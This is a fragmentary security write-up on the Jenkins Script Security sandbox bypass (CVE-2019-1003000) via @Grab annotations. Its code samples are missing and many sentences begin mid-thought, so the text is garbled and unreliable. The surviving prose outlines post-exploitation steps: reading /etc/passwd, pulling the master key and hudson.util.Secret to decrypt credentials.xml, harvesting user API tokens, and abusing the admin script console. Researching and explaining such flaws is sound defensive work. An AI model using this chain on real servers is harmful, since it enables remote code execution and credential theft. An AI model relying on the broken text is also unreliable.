Sandbox Bypass in Script Security and Pipeline PluginsSECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)Script Security sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements.Both the pipeline validation REST APIs and actual script/pipeline execution are affected.This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master.All known unsafe AST transformations in Groovy are now prohibited in sandboxed scripts.
GroovySandboxclass creates the compiler configuration. There is an additional step that add compilation customizer
RejectASTTransformsCustomizerthat with a the disabled transformations of only a single value:
RejectASTTransformsCustomizeris a new class with a logic that traverse annotations and do simple blacklist checking:
commons-lang:commons-lang:2.4library as dependency in classpath. Then, we can import
Grab, we can make Jenkins import arbitrary packages from external maven repository during build-script compile-time.
cat /etc/passwdin the job console output.
$JENKINS_HOME. In this directory, we can read (and modify) information about the users, jobs, etc. However, sensitive data (e.g.s secrets) is encrypted.
$JENKINS_HOMEdirectory. I am not saying that this is a bad practice, because the problem of storing key itself is a hard problem. You may search more about this in google with term "Secret Zero Problem".
secrets/hudson.util.Secret. With these two file, we can decrypt all the encrypted information inside Jenkins. For example we can decrypt Jenkins secret stored in
credentials.xml. There are already many scripts on the internet for decrypting the Jenkins secret, e.g. jenkins-decrypt.
$JENKINS_HOME/users. Moreover, we can see data or state about the user at
$JENKINS/users/[user]/config.xml. In an older Jenkins version, if a user has generated access tokens before, those access tokens are stored and retrievable in
AuthorizationHTTP Header. For demonstration, we can use curl to do whoami in Jenkins:
.bashrc, we can utilize the hijacked Jenkins admin account. Jenkins provides a script console functionality that can be used admin to execute arbitrary Groovy script in non-sandbox mode.
Job/Configurepermission and optionally
Job/Buildto trigger build execution. Nonetheless, this method displays how we can exploit CVE-2019-1003000 to escape the sandbox bypass, and then execute arbitrary command with a normal Jenkins user. Furthermore, this vulnerability can also be chained with previous vulnerabilities that allow unauthenticated RCE. I recommend reading this article.